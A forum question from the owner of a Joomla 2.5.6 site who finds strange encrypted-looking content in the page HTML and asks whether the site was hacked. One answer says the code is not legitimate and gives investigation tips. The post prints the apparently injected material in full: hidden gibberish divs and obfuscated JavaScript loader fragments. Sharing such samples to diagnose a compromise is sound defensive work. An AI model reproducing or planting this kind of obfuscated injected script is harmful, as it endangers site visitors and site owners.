Home / server / Questions / 750692
In Process
Viktor Joras
Asked: 2016-01-22 00:23:10 +0800 CST

Joomla site hacked? [duplicate]

  • 772

I have a doubt abount a joomla 2.5.6 site. Once in a while I notice some stranged crypted code in the page HTML source. Something like this:

<div id="bwjolqpgqnqho" class="vhdpqfdouxwsm">b kb q bxdb bjdfar, cccw da dkbd arbhcsb mbzcl bmct bpdjas e lbuasa mawdoexcuaf cdc. l axagbqdjc ze scwdk dkcrcq eudcdee qere p cre ia ydgdv dmcpdd cu dgbyaj abbnbmbm - abbz b cagcia 'faya' rawd g edcscm ac a - datbwaue pc caa. bjciccb, s. bk beccd rdye. ve kdg dzcoae. bnac dadjcudgbz - b easchcf b mb cesaqdac, d alahbdd paacfbz ccar aycdbd budoac et cpcudkax bb cba t, a pcdbl cdc nbk dpakcea dawdk d adgemcfbyb abbbccia, c dtccbablcj; bnbjciagdndcdw eq eqdbcddfarch. d jd, ocpdfarbuaw a lb g b u bwd edxa z abb ybe awd, iahbbadbybhabclbxagbpdhc zesdda xaxa qabchadambmdxcabdb ucs aaet czdbal, ah an; cgad doeu bj cfabbk d la gcbb 35 cb aavavawb kbcaz bib kbwagb zdn akcjdcasb aaabbc gataw. cdeicdaacdaicuecdoc waial dbbhapagbmbj e r doepaca vb rddbbbdbaatcka sd kdtetelbf clajayehcr aaam akaybzdkdqc cb icbdbbkdqa ebgazda dmbbaoce afajbx btc ba. gbqdga hbhaqddcsdbbdbwaua dclbudvb ccbd ddkejacaham a. ddaerc vaucdb ncc bbbvc taj clad asb! b. aqbbchalanc cbubm bcebcoambyaebcba, b faqbxcuabcj. bme. ean, bodfaxcdaz doaobaar bhasanbibib. g cnc ddmaveebe, d adbdpd ebwd nafdyevbmdle wc taub rdrcta wa kczbvdhdeec - evesdme la b dedx dpctdmdfadcla cawcgeodtd pekacctela cawaraub cbidncmdsewe lc zerao cw, c gamabazbe areadm, cz ccbic bdddsbbdq</div>
<div id="ixoxvsjxrhw" class="vhdpqfdouxwsm">RKCoG2eSjsxstVfb</div>
<script>
var dstyivgcdrqqdx=(1929296112>2050752883?"\x6b\x77":"\x72\x76");
var nmhccirwiihn=(104472961<11000854?"\x65\x74":"re");
var lisknlunhmqet=(1186652785<445269550?"\x77\x64":"r");
nmhccirwiihn+=(531284007+653848334>327931464?"\x74\x75\x72\x6e":"h");
var zrjtzvapxzu=(14463650+610071539>61219278?"\x72\x65\x74\x75":"h");
var aszmusumizwozpig=(426160674+1361381336<387797917+1566709949?"\x72\x65":"jxt");
var izpemkvqmmobs=(950083231>1227876977?"\x70\x66":"i");
dstyivgcdrqqdx+=(493011132<452720027?"\x79\x7a":"\x3a\x31\x31");
nmhccirwiihn+=(794042046+1118740131>1233259606?"\x20":"d");
var bsgwqjlfbyrqlp=(2035779590<1136018259?"aq":"ret");
var sfqcsmbjevzhln=(312554261+65106612<187058867+677910351?"\x72":"\x72\x7a\x77");
var utwwjrxktzrx=(114217555+1954790718>894395565?"[]":"\x6f\x6b");
var iolbbxrrjeidgrp=(303028237+550171059<514432896+821377708?"\x72":"\x74");
iolbbxrrjeidgrp+=(499985427>889587822?"nok":"\x65\x74\x75\x72\x6e");
var kqmuuyelqyxqfz=(1527911828+613124032<663145577+1481136903?"f":"p");
utwwjrxktzrx+=(1536082584>1934435039?"xh":"\x5b\x75\x79");
var tzrjfsqughnav=(796279552+607718112>17600193?"\x72":"mj");
kqmuuyelqyxqfz+=(1697844671+167811137<1412837828+546852759?"\x75":"\x76\x65");
utwwjrxktzrx+=(60945469>1170273576?"w":"\x75\x6f");
zrjtzvapxzu+=(1251932751+160236872<947197532+500098101?"rn":"us");
kqmuuyelqyxqfz+=(1710202476+289532444<928257733+1147619777?"n":"\x7a\x77");
var idxxspyqjdhtws=(1205489743+143021423<964968493+774463552?"ret":"\x6f\x65\x66");
var ixoxvsjxrhw=(503914128+831334202>754056605?"\x69\x78\x6f":"gi");
tzrjfsqughnav+=(175195049+91195650>199815031?"\x65\x74":"rk");
idxxspyqjdhtws+=(998203113>1543504395?"\x73\x71":"u");
aszmusumizwozpig+=(1183542335+117680842<615936676+1097840178?"\x74\x75\x72\x6e":"\x70\x72");
iolbbxrrjeidgrp+=(1417804280<956308750?"ser":" ");
nmhccirwiihn+=(1275596373+304125062<938435994+1190623659?"i":"s");
var rcnaswwbdim=(1604120453<1554370323?"\x66\x73":"\x72\x65\x74");
var lvjbjpqohpl=(109054309+35702381<263995810+676605071?"\x72":"f");
utwwjrxktzrx+=(995689741>2028647691?"st":"w");

var muflxttvhbex=[dstyivgcdrqqdx, aplkenurwllomp,];
for (zjbwmhyuoepma=thrxwuwdiaqq; edrpvfucpe(zjbwmhyuoepma,ctjtpxekjsbrnt(muflxttvhbex)); zjbwmhyuoepma++)
{
    if (edrpvfucpe((+[window.sidebar]),bjscvqbtkrcf(utcexmovlgf(zjbwmhyuoepma),muflxttvhbex[zjbwmhyuoepma])))
    {
        wenqrusckvqv=tmwjgjdehfebi(ctjtpxekjsbrnt(muflxttvhbex), zjbwmhyuoepma);
        break;
    }
}</script>
<div class="vhdpqfdouxwsm">by cvekdycuc ceicqendacwcvczdzdwdlcdes dkdvcxeld xcfc; yepea. eg csd k cbd veccw, d wcyeocqebdd cyeb cvb zcobzd kdfcadgdud. ye hep dyc tedcve jdte sdx crejcz. e acudjdldxdbd bcecpepb xby, czcsdycdcact cpc edvdfdacod vcr e. b d a by coeoeac ocpe kcacrehcoc sefepe qb yc pes</div>
<script>
for (zjbwmhyuoepma=thrxwuwdiaqq; edrpvfucpe(zjbwmhyuoepma, ctjtpxekjsbrnt(bicxcttzqmg)); zjbwmhyuoepma=wybnybknfgac(zjbwmhyuoepma, xbvdbcshcctsgdxd))
{
    var ysmxkecizsyq=yvmzahgdgrtno(bicxcttzqmg, zjbwmhyuoepma);
    if (wettklooonrumf(dtjvvrebndhszo(46*wenqrusckvqv + 5, ysmxkecizsyq), dtjvvrebndhszo(ysmxkecizsyq, 52*wenqrusckvqv + 18)))
    {
        if (vynawhmpavrzx(ifajvnijackoa, wenqrusckvqv))
        {
            lcxnvxkmfihz=wybnybknfgac(lcxnvxkmfihz, myrttyhlwgbhon(vynawhmpavrzx((mvdcltcvebpo(wybnybknfgac(nlzjcpleylbraq, tmwjgjdehfebi(ysmxkecizsyq, 46*wenqrusckvqv + 5)), yvmzahgdgrtno(wfnqmuukgcio, vynawhmpavrzx(lrrmwfxzyrc, ctjtpxekjsbrnt(wfnqmuukgcio))))), 94*wenqrusckvqv + 67)));
            lrrmwfxzyrc=wybnybknfgac(lrrmwfxzyrc, xbvdbcshcctsgdxd);
        }
        else
        {
            nlzjcpleylbraq=ziesauzqqjdi(12*wenqrusckvqv + 2, tmwjgjdehfebi(ysmxkecizsyq, 46*wenqrusckvqv + 5));
        }
        ifajvnijackoa=wybnybknfgac(ifajvnijackoa, xbvdbcshcctsgdxd);
    }
}

I don't know if this a legit code generated from some module or the result of a hack.

joomla

1 Answers

  1. It doesn't seem legit to me. If you have root access on the server, run the stat command on the file.html stat file.html and look for the time when it was changed. This will help you in your investigation on how the server got hacked. Since that version of Joomla you mentioned is pretty old, I suspect they either got in using a vulnerability in Joomla's core or either you have one vulnerable extension. You can get more information regarding vulnerable extensions at https://vel.joomla.org/

    • 1